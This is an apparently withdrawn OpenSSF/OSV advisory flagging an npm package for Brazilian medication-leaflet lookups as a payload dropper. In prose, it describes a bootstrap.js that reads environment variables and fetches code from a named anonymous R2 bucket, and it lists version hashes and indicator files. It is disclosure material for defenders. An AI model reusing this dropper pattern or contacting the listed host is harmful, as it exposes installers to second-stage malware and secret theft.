MAL-2026-4406
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@mcpassure/mcp-anvisa-bulario/MAL-2026-4406.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4406
- Withdrawn
- 2026-05-26T18:22:54Z
- Published
- 2026-05-20T00:39:56Z
- Modified
- 2026-05-27T00:31:59.698295556Z
- Summary
- Malicious code in @mcpassure/mcp-anvisa-bulario (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (e846cabb7b5077244737d7a465e944ebe7635db46cc55e7e5736eeda47d30938)
dist/bootstrap.js references a hardcoded URL on pub-046c52795b9445cd9f5cc5cb21b9d59f.r2.dev — an anonymous Cloudflare R2 bucket — and calls fetch() against it while reading process.env. This destination shape (a freshly provisioned, anonymous pub-*.r2.dev bucket holding executable payload bytes) matches the @chahuadev-style dropper infrastructure pattern: a mutable, publisher-unaffiliated host with no integrity verification, used to deliver second-stage code to installers. There is no legitimate reason for an ANVISA drug-information MCP server to retrieve code or data from an anonymous R2 bucket; the package's stated purpose (Brazilian medication bulário lookups) does not require any such asset. Combined with the env-var read adjacent to the fetch call, the structural signals are: (1) hardcoded non-publisher anonymous host, (2) no version pinning or hash verification, (3) purpose mismatch with package description, (4) environment-variable access in proximity to the outbound request. Treat as a payload-distribution dropper.
- Database specific
{ "malicious-packages-origins": [ { "versions": [ "2.1.7" ], "modified_time": "2026-05-20T00:39:56Z", "sha256": "2cb99eb86200644b4f108b751a41ac2fa4ac3c2996160eac58da8369d8be80b6", "id": "IN-MAL-2026-003322", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:25.41866891Z" }, { "versions": [ "2.1.6" ], "modified_time": "2026-05-20T00:47:34Z", "sha256": "e846cabb7b5077244737d7a465e944ebe7635db46cc55e7e5736eeda47d30938", "id": "IN-MAL-2026-003327", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:25.934749943Z" }, { "versions": [ "2.1.2" ], "modified_time": "2026-05-20T01:09:48Z", "sha256": "3be741993dd2133dfb8effe009f0d798f80ea44283059adc964d4c639a4d1b5c", "id": "IN-MAL-2026-003341", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:27.439539639Z" }, { "versions": [ "2.1.8" ], "modified_time": "2026-05-20T01:26:25Z", "sha256": "4783477f054bd24b84a903f7b8b66ff56f7752970bb0d362b0c117b03be62fdf", "id": "IN-MAL-2026-003358", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:29.371185279Z" }, { "versions": [ "2.1.1" ], "modified_time": "2026-05-20T01:32:29Z", "sha256": "b82c82ddf6a54b51ff773c550650233a2a05888aca35918911c2b277d1436c03", "id": "IN-MAL-2026-003364", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:29.942598689Z" }, { "versions": [ "2.1.4" ], "modified_time": "2026-05-20T01:13:46Z", "sha256": "5581b1fa309dcd3b41b45f5fc16c6abe59cfda373116e92fe137fb7bf772c3e5", "id": "IN-MAL-2026-003348", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:28.276930252Z" }, { "versions": [ "2.1.3" ], "modified_time": "2026-05-20T01:36:22Z", "sha256": "590355913700543ba116384af4aff83e5aefcadae860c2c3c6a4ba434b1f6872", "id": "IN-MAL-2026-003367", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:30.23231406Z" }, { "versions": [ "2.1.10" ], "modified_time": "2026-05-20T01:46:55Z", "sha256": "5f2f6e0a8441ee1e78d37fed1a981e6342ee276e8667b1ff0e1124bc3a0213f9", "id": "IN-MAL-2026-003381", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:32.101166995Z" }, { "versions": [ "2.1.5" ], "modified_time": "2026-05-20T01:20:56Z", "sha256": "cde284274517321fc712dc124b72622fc6cd4d1255851e1b9a49b5dbef8d9bbb", "id": "IN-MAL-2026-003355", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:29.007637114Z" }, { "versions": [ "2.1.9" ], "modified_time": "2026-05-20T01:07:25Z", "sha256": "e25c90fdc87c17cd388b917a0618ad5feb612becb07d01aa0bda5095b9116f8b", "id": "IN-MAL-2026-003339", "source": "amazon-inspector", "import_time": "2026-05-26T05:50:27.242813193Z" } ] }- References
-
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.7
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.6
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.2
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.8
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.1
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.4
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.3
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.10
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.5
- https://www.npmjs.com/package/@mcpassure/mcp-anvisa-bulario/v/2.1.9
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / @mcpassure/mcp-anvisa-bulario
Package
- Name
- @mcpassure/mcp-anvisa-bulario
- View open source insights on deps.dev
- Purl
- pkg:npm/%40mcpassure%2Fmcp-anvisa-bulario
Database specific
cwes
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@mcpassure/mcp-anvisa-bulario/MAL-2026-4406.json"
indicators
{
"package_integrity": [
{
"filename": "mcp-anvisa-bulario-2.1.7.tgz",
"hashes": {
"sha512_sri": "sha512-mYwG5BgrOxJG/hBlrvX5qlFEHOYtrEk5WTeKXFcajgkw+WLv21tkQC4CKE881hWPdlAqNGqwy7MvX5sLDvdlKQ==",
"sha1": "6ebf26c647815a38af4fa2d2d936ebc470ffc7ad"
}
}
],
"evidence_files": [
{
"path": "dist/bootstrap.js",
"tlsh": "219153865dfb1636016673e8072f900a36be4007355fcd40bf9d9390bf8906cda726ea",
"sha256": "8e181b47d3a95b197eb68402402d3f93af33727c61c9c667cd982f459a14b9ad"
}
]
}